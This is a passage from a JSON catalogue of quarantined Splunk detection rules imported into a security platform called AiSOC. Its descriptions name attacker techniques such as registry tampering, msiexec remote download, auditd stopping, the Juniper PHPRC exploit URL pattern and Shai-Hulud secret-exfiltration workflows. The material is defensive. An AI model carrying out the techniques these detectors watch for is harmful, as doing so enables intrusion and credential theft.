If confirmed malicious, this action could lead to unauthorized access, privilege escalation, and potential system-wide compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-security-account-manager-stopped.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "69c12d59-d951-431e-ab77-ec426b8d65e6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_security_account_manager_stopped.yml" } }, { "id": "splunk-security-content-69df7f7c-155d-11ec-a055-acde48001122", "type": "detection", "name": "Get WMIObject Group Discovery with Script Block Logging", "description": "The following analytic detects the execution of the `Get-WMIObject Win32_Group` command using PowerShell Script Block Logging (EventCode=4104). This method captures the full command sent to PowerShell, allowing for detailed analysis. Identifying group information on an endpoint is not inherently malicious but can be suspicious based on context such as time, endpoint, and user. This activity is significant as it may indicate reconnaissance efforts by an attacker. 
If confirmed malicious, it could lead to further enumeration and potential lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/get-wmiobject-group-discovery-with-script-block-logging.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "69df7f7c-155d-11ec-a055-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/get_wmiobject_group_discovery_with_script_block_logging.yml" } }, { "id": "splunk-security-content-69e2860c-0e4b-40ae-9dc4-bf9e3bf2a548", "type": "detection", "name": "Crowdstrike Privilege Escalation For Non-Admin User", "description": "The following analytic detects CrowdStrike alerts for privilege escalation attempts by non-admin users. These alerts indicate unauthorized efforts by regular users to gain elevated permissions, posing a significant security risk. 
Detecting and addressing these attempts promptly helps prevent potential breaches and ensures that user privileges remain properly managed, maintaining the integrity of the organization's security protocols.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/crowdstrike-privilege-escalation-for-non-admin-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "69e2860c-0e4b-40ae-9dc4-bf9e3bf2a548", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/crowdstrike_privilege_escalation_for_non_admin_user.yml" } }, { "id": "splunk-security-content-6a12fa9f-580d-4627-8c7f-313e359bdc6a", "type": "detection", "name": "Windows Modify Registry No Auto Reboot With Logon User", "description": "The following analytic detects a suspicious modification to the Windows registry that disables automatic reboot with a logged-on user. This detection leverages the Endpoint data model to identify changes to the registry path `SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU\\NoAutoRebootWithLoggedOnUsers` with a value of `0x00000001`. This activity is significant as it is commonly used by adversaries, including malware like RedLine Stealer, to evade detection and maintain persistence. 
If confirmed malicious, this could allow attackers to bypass security measures and deploy additional payloads without interruption.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-no-auto-reboot-with-logon-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6a12fa9f-580d-4627-8c7f-313e359bdc6a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_no_auto_reboot_with_logon_user.yml" } }, { "id": "splunk-security-content-6a168ce8-9a39-4492-9416-a67abdc56c53", "type": "detection", "name": "MCP Postgres Suspicious Query", "description": "This detection identifies potentially malicious SQL queries executed through MCP PostgreSQL server connections, monitoring for privilege escalation attempts, credential theft, and schema reconnaissance. 
These patterns are commonly observed in SQL injection attacks, compromised application credentials, and insider threat scenarios targeting database assets.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/mcp-postgres-suspicious-query.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6a168ce8-9a39-4492-9416-a67abdc56c53", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/mcp_postgres_suspicious_query.yml" } }, { "id": "splunk-security-content-6a1b6cbe-6612-44c3-92b9-1a1bd77412eb", "type": "detection", "name": "Windows Defender ASR Registry Modification", "description": "The following analytic detects modifications to Windows Defender Attack Surface Reduction (ASR) registry settings. It leverages Windows Defender Operational logs, specifically EventCode 5007, to identify changes in ASR rules. This activity is significant because ASR rules are designed to block actions commonly used by malware to exploit systems. Unauthorized modifications to these settings could indicate an attempt to weaken system defenses. 
If confirmed malicious, this could allow an attacker to bypass security measures, leading to potential system compromise and data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-defender-asr-registry-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6a1b6cbe-6612-44c3-92b9-1a1bd77412eb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_defender_asr_registry_modification.yml" } }, { "id": "splunk-security-content-6a80300a-9f8a-4f22-bd3e-09ca577cfdfc", "type": "detection", "name": "Windows Privilege Escalation Suspicious Process Elevation", "description": "The following analytic detects when a process running with low or medium integrity from a user account spawns an elevated process with high or system integrity in suspicious locations.\nThis behavior is identified using process execution data from Windows process monitoring.\nThis activity is significant as it may indicate a threat actor successfully elevating privileges, which is a common tactic in advanced attacks.\nIf confirmed malicious, this could allow the attacker to execute code with higher privileges, potentially leading to full system compromise and persistent access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1068", "T1548", "T1134" ], "log_source": null, "playbook": null, "verified": false, 
"source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-privilege-escalation-suspicious-process-elevation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6a80300a-9f8a-4f22-bd3e-09ca577cfdfc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_privilege_escalation_suspicious_process_elevation.yml" } }, { "id": "splunk-security-content-6aa49ff2-3c92-4586-83e0-d83eb693dfda", "type": "detection", "name": "Windows MSIExec Remote Download", "description": "The following analytic detects the use of msiexec.exe with an HTTP or\nHTTPS URL in the command line, indicating a remote file download attempt. This detection\nleverages data from Endpoint Detection and Response (EDR) agents, focusing on process\nexecution logs that include command-line details. This activity is significant as\nit may indicate an attempt to download and execute potentially malicious software\nfrom a remote server. 
If confirmed malicious, this could lead to unauthorized code\nexecution, system compromise, or further malware deployment within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-msiexec-remote-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6aa49ff2-3c92-4586-83e0-d83eb693dfda", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_msiexec_remote_download.yml" } }, { "id": "splunk-security-content-6aa6f9dd-adfe-45a8-8f74-c4c7a0d7d037", "type": "detection", "name": "Active Directory Lateral Movement Identified", "description": "The following analytic identifies potential lateral movement activities within an organization's Active Directory (AD) environment. It detects this activity by correlating multiple analytics from the Active Directory Lateral Movement analytic story within a specified time frame. This is significant for a SOC as lateral movement is a common tactic used by attackers to expand their access within a network, posing a substantial risk. 
If confirmed malicious, this activity could allow attackers to escalate privileges, access sensitive information, and persist within the environment, leading to severe security breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1210" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/active-directory-lateral-movement-identified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6aa6f9dd-adfe-45a8-8f74-c4c7a0d7d037", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/active_directory_lateral_movement_identified.yml" } }, { "id": "splunk-security-content-6ad6b548-adfa-452c-aa77-9ff94877e832", "type": "detection", "name": "Zoom High Video Latency", "description": "Detects particularly high latency from Zoom logs. 
Latency observed from threat actors performing Remote Employment Fraud (REF) is typically well above what\u2019s normal for the majority of employees.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/zoom-high-video-latency.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6ad6b548-adfa-452c-aa77-9ff94877e832", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/zoom_high_video_latency.yml" } }, { "id": "splunk-security-content-6ae0148e-9215-11eb-a94a-acde48001122", "type": "detection", "name": "Disabling ControlPanel", "description": "The following analytic detects registry modifications that disable the Control Panel on Windows systems. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the registry path \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoControlPanel\" with a value of \"0x00000001\". This activity is significant as it is commonly used by malware to prevent users from accessing the Control Panel, thereby hindering the removal of malicious artifacts and persistence mechanisms. 
If confirmed malicious, this could allow attackers to maintain control over the infected machine and prevent remediation efforts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disabling-controlpanel.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6ae0148e-9215-11eb-a94a-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disabling_controlpanel.yml" } }, { "id": "splunk-security-content-6b0cb0ff-9a7e-4475-a687-43827fdb31d6", "type": "detection", "name": "Linux Auditd Auditd Daemon Start", "description": "The following analytic detects the (re)initialization of the Linux audit daemon (auditd) by identifying log entries of type DAEMON_START. This event indicates that the audit subsystem has resumed logging after being stopped or has started during system boot. While DAEMON_START may be expected during reboots or legitimate configuration changes, it can also signal attempts to re-enable audit logging after evasion, or restarts with modified or reduced rule sets. Monitoring this event in correlation with DAEMON_END, DAEMON_ABORT, and auditctl activity provides visibility into the continuity and integrity of audit logs. 
Frequent or unexplained DAEMON_START events should be investigated, especially if they are not accompanied by valid administrative or system activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-auditd-daemon-start.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6b0cb0ff-9a7e-4475-a687-43827fdb31d6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_auditd_daemon_start.yml" } }, { "id": "splunk-security-content-6b1b84c4-3834-4dee-b062-9b79bdb31d15", "type": "detection", "name": "Windows Process Execution From RDP Share", "description": "The following analytic identifies process executions originating from RDP shares on Windows endpoints.\nRemote Desktop Protocol (RDP) shares, typically accessed via the \"tsclient\" path, allow users to share files between their local machine and a remote desktop session. 
However, threat actors may exploit RDP shares to execute malicious processes or transfer harmful files onto a compromised system.\nThis detection focuses on identifying any process executions that originate from RDP shares, which could indicate unauthorized access or malicious activity.\nSecurity teams should investigate any instances of such process executions, especially if they are found on systems that should not be using RDP shares or if the executed processes are unfamiliar or suspicious.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.001", "T1105", "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-process-execution-from-rdp-share.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6b1b84c4-3834-4dee-b062-9b79bdb31d15", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_process_execution_from_rdp_share.yml" } }, { "id": "splunk-security-content-6b4a0a7f-10d1-4d72-9c4c-5c6a3d9f9d6a", "type": "detection", "name": "Shai-Hulud Workflow File Creation or Modification", "description": "Detects creation or deletion of malicious GitHub Actions workflow files associated with\nShai-Hulud worm variants on Linux or Windows endpoints. This includes the original shai-hulud-workflow.yml,\nthe 2.0 backdoor discussion.yaml (enables command injection via GitHub Discussions on self-hosted\nrunners named SHA1HULUD), and the secrets exfiltration workflow formatter_*.yml pattern. 
These\nfiles are used to exfiltrate credentials and propagate across repositories.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.006", "T1554", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/shai-hulud-workflow-file-creation-or-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6b4a0a7f-10d1-4d72-9c4c-5c6a3d9f9d6a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/shai_hulud_workflow_file_creation_or_modification.yml" } }, { "id": "splunk-security-content-6b521149-b91c-43aa-ba97-c2cac59ec830", "type": "detection", "name": "Windows AD Privileged Account SID History Addition", "description": "The following analytic identifies when the SID of a privileged user is added to the SID History attribute of another user. It leverages Windows Security Event Codes 4742 and 4738, combined with identity lookups, to detect this activity. This behavior is significant as it may indicate an attempt to abuse SID history for unauthorized access across multiple domains. 
If confirmed malicious, this activity could allow an attacker to escalate privileges or maintain persistent access within the environment, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1134.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-privileged-account-sid-history-addition.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6b521149-b91c-43aa-ba97-c2cac59ec830", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_privileged_account_sid_history_addition.yml" } }, { "id": "splunk-security-content-6b74d578-a02e-4e94-a0d1-39440d0bf254", "type": "detection", "name": "Detect Regsvcs with No Command Line Arguments", "description": "The following analytic detects instances of regsvcs.exe running without command line arguments. This behavior typically indicates process injection, where another process manipulates regsvcs.exe. The detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, IDs, and command-line executions. This activity is significant as it may signal an attempt to evade detection and execute malicious code. 
If confirmed malicious, the attacker could achieve code execution, potentially leading to privilege escalation, persistence, or access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.009" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-regsvcs-with-no-command-line-arguments.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6b74d578-a02e-4e94-a0d1-39440d0bf254", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_regsvcs_with_no_command_line_arguments.yml" } }, { "id": "splunk-security-content-6b813efd-8859-406f-b677-719458387fac", "type": "detection", "name": "Cisco Duo Policy Allow Tampered Devices", "description": "The following analytic detects when a Duo policy is created or updated to allow tampered or rooted devices, such as jailbroken smartphones,\nto access protected resources. It identifies this behavior by searching Duo administrator activity logs for policy changes where the allow_rooted_devices\nsetting is enabled. This is accomplished by filtering for policy creation or update actions and parsing the policy description for the relevant configuration.\nAllowing tampered devices poses a significant security risk, as these devices may bypass built-in security controls, run unauthorized software, or be more\nsusceptible to compromise. 
For a Security Operations Center (SOC), identifying such policy changes is critical because it may indicate either a\nmisconfiguration or a malicious attempt to weaken authentication requirements, potentially enabling attackers to access sensitive systems with\ncompromised devices. The impact of this attack can include unauthorized access, data breaches, and lateral movement within the environment,\nmaking prompt detection and response essential to maintaining organizational security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-duo-policy-allow-tampered-devices.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6b813efd-8859-406f-b677-719458387fac", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_duo_policy_allow_tampered_devices.yml" } }, { "id": "splunk-security-content-6c077f81-2a83-4537-afbc-0e62e3215d55", "type": "detection", "name": "Linux Indicator Removal Service File Deletion", "description": "The following analytic detects the deletion of Linux service unit configuration files by suspicious processes. It leverages Endpoint Detection and Response (EDR) telemetry, focusing on processes executing the 'rm' command targeting '.service' files. This activity is significant as it may indicate malware attempting to disable critical services or security products, a common defense evasion tactic. 
If confirmed malicious, this behavior could lead to service disruption, security tool incapacitation, or complete system compromise, severely impacting the integrity and availability of the affected Linux host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-indicator-removal-service-file-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6c077f81-2a83-4537-afbc-0e62e3215d55", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_indicator_removal_service_file_deletion.yml" } }, { "id": "splunk-security-content-6c135f8d-5e60-454e-80b7-c56eed739833", "type": "detection", "name": "RunDLL Loading DLL By Ordinal", "description": "The following analytic detects rundll32.exe loading a DLL export function by ordinal value. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process command-line executions. This behavior is significant because adversaries may use rundll32.exe to execute malicious code while evading security tools that do not monitor this process. 
If confirmed malicious, this activity could allow attackers to execute arbitrary code, potentially leading to system compromise, privilege escalation, or persistent access within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/rundll-loading-dll-by-ordinal.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6c135f8d-5e60-454e-80b7-c56eed739833", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/rundll_loading_dll_by_ordinal.yml" } }, { "id": "splunk-security-content-6c382336-22b8-4023-9b80-1689e799f21f", "type": "detection", "name": "O365 File Permissioned Application Consent Granted by User", "description": "The following analytic identifies instances where a user in the Office 365 environment grants consent to an application requesting file permissions for OneDrive or SharePoint. It leverages O365 audit logs, focusing on OAuth application consent events. This activity is significant because granting such permissions can allow applications to access, modify, or delete files, posing a risk if the application is malicious or overly permissive. 
If confirmed malicious, this could lead to data breaches, data loss, or unauthorized data manipulation, necessitating immediate investigation to validate the application's legitimacy and assess potential risks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1528" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-file-permissioned-application-consent-granted-by-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6c382336-22b8-4023-9b80-1689e799f21f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_file_permissioned_application_consent_granted_by_user.yml" } }, { "id": "splunk-security-content-6ca919db-52f3-4c95-a4e9-7b189e8a043d", "type": "detection", "name": "O365 SharePoint Suspicious Search Behavior", "description": "The following analytic identifies when Office 365 users search for suspicious keywords or have an excessive number of queries to a SharePoint site within a limited timeframe. 
This behavior may indicate that a malicious actor has gained control of a user account and is conducting discovery or enumeration activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1213.002", "T1552" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-sharepoint-suspicious-search-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6ca919db-52f3-4c95-a4e9-7b189e8a043d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_sharepoint_suspicious_search_behavior.yml" } }, { "id": "splunk-security-content-6cb9d0e1-eabe-41de-a11a-5efade354e9d", "type": "detection", "name": "Linux Auditd Auditd Service Stop", "description": "The following analytic detects the suspicious auditd service stop. This behavior is critical for a SOC to monitor because it may indicate attempts to gain unauthorized access or maintain control over a system. Such actions could be signs of malicious activity. If confirmed, this could lead to serious consequences, including a compromised system, unauthorized access to sensitive data, or even a wider breach affecting the entire network. 
Detecting and responding to these signs early is essential to prevent potential security incidents.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-auditd-service-stop.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6cb9d0e1-eabe-41de-a11a-5efade354e9d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_auditd_service_stop.yml" } }, { "id": "splunk-security-content-6cc4cc3d-b10a-4fac-be1e-55d384fc690e", "type": "detection", "name": "Juniper Networks Remote Code Execution Exploit Detection", "description": "The following analytic detects attempts to exploit a remote code execution vulnerability in Juniper Networks devices. It identifies requests to /webauth_operation.php?PHPRC=*, which are indicative of uploading and executing malicious PHP files. This detection leverages the Web data model, focusing on specific URL patterns and HTTP status codes. This activity is significant because it signals an attempt to gain unauthorized access and execute arbitrary code on the device. 
If confirmed malicious, the attacker could gain control over the device, leading to data theft, network compromise, or other severe consequences.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1105", "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/juniper-networks-remote-code-execution-exploit-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6cc4cc3d-b10a-4fac-be1e-55d384fc690e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/juniper_networks_remote_code_execution_exploit_detection.yml" } }, { "id": "splunk-security-content-6d663014-fe92-11eb-ab07-acde48001122", "type": "detection", "name": "GSuite Email Suspicious Attachment", "description": "The following analytic detects suspicious attachment file extensions in GSuite emails, potentially indicating a spear-phishing attack. It leverages GSuite Gmail logs to identify emails with attachments having file extensions commonly associated with malware, such as .exe, .bat, and .js. This activity is significant as these file types are often used to deliver malicious payloads, posing a risk of compromising targeted machines. 
If confirmed malicious, this could lead to unauthorized code execution, data breaches, or further network infiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/gsuite-email-suspicious-attachment.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6d663014-fe92-11eb-ab07-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/gsuite_email_suspicious_attachment.yml" } }, { "id": "splunk-security-content-6d70780d-4cfe-4820-bafd-1b43941986b5", "type": "detection", "name": "Windows Powershell Logoff User via Quser", "description": "The following analytic detects the process of logging off a user through the use of the quser and logoff commands. By monitoring for these commands, the analytic identifies actions where a user session is forcibly terminated, which could be part of an administrative task or a potentially unauthorized access attempt. 
